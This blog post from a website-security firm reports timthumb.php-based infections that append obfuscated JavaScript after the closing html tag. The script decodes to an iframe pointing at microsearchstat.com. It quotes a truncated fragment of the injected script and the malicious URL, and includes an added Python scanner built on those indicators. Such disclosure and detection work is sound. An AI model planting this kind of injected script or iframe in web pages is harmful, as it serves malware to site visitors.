More timthumb.php infections

I don’t like making every announcement of new infections regarding timthumb.php. It feels like everyone is pointing the finger at the author, but I do have to report the recent happenings, so here goes.

The latest website infections we’ve been seeing inject an obfuscated script at the bottom of .html files and of the index.php file.

The code looks like:

(opening script tag)String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q)...
n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h...eval(ss);(closing script tag)

We usually see this at the very bottom of the file, typically after the closing html tag in an .html file.

This code deobfuscates to an iframe that includes:

microsearchstat.com/temp/stat.php
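An added detection example, not code from the original post or from WeWatchYourWebsite: the Python below walks a web root, inspects the files this campaign modifies (.html files and index.php), and flags the fixed strings quoted above, the microsearchstat.com URL, and any script block appended after the closing html tag. The embedded sample pages are constructed and the function names are assumptions.

```python
from __future__ import annotations

import re
from pathlib import Path

# Fixed strings from the obfuscated sample quoted in the post, plus the domain the
# iframe points to (only visible if a variant stores the decoded payload in clear).
MARKERS = (
    'String.prototype.test="harC"',
    "eval(ss);",
    "microsearchstat.com/temp/stat.php",
)
# A <script> element after the closing </html> tag has no place in a static page;
# the post notes the injected code sits exactly there.
TRAILING_SCRIPT = re.compile(r"</html>\s*<script\b.*?</script>", re.IGNORECASE | re.DOTALL)

def inspect_content(text: str) -> dict:
    """Check one file's contents and report which indicators matched."""
    matched = [m for m in MARKERS if m in text]
    after_html = TRAILING_SCRIPT.search(text) is not None
    return {"markers": matched, "script_after_html": after_html,
            "suspicious": bool(matched) or after_html}

def scan_webroot(root: str) -> list[tuple[str, dict]]:
    """Walk a web root, inspecting .html files and index.php, the files this campaign modifies."""
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        if path.suffix.lower() not in (".html", ".htm") and path.name.lower() != "index.php":
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip it rather than abort the scan
        result = inspect_content(text)
        if result["suspicious"]:
            hits.append((str(path), result))
    return hits

# Constructed sample pages (not real captures): the clean page, and the same page
# with the post's script prefix appended after </html>.
CLEAN_SAMPLE = "<html><body><p>hello</p></body></html>\n"
INFECTED_SAMPLE = CLEAN_SAMPLE + (
    '<script>String.prototype.test="harC";for(i in $=\'\')m=$[i];var ss="";eval(ss);</script>'
)
```

Run `scan_webroot("/path/to/webroot")` and review each hit by hand; a trailing script block is a strong hint but the marker strings are the campaign-specific evidence.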

As of this writing, Google does not flag this URL as suspicious; however, its diagnostic for the site reports:

What is the current listing status for microsearchstat.com?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 4 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-09-02, and the last time suspicious content was found on this site was on 2011-09-02.
Malicious software includes 1 trojan(s).

That is for today, September 2, 2011, which is the same day that Google reports as the last time it found suspicious content.

Again, we’ve cleaned this on WordPress sites with vulnerable timthumb.php files. Those files really need to be updated.

If your website is listed as having malicious or suspicious content and it’s linked to microsearchstat.com, you might want to look for the code mentioned above.

If you need help cleaning this, please send us an email: support@wewatchyourwebsite.com or call us at (847)728-0214.

Have you spotted this on your website? Let us know…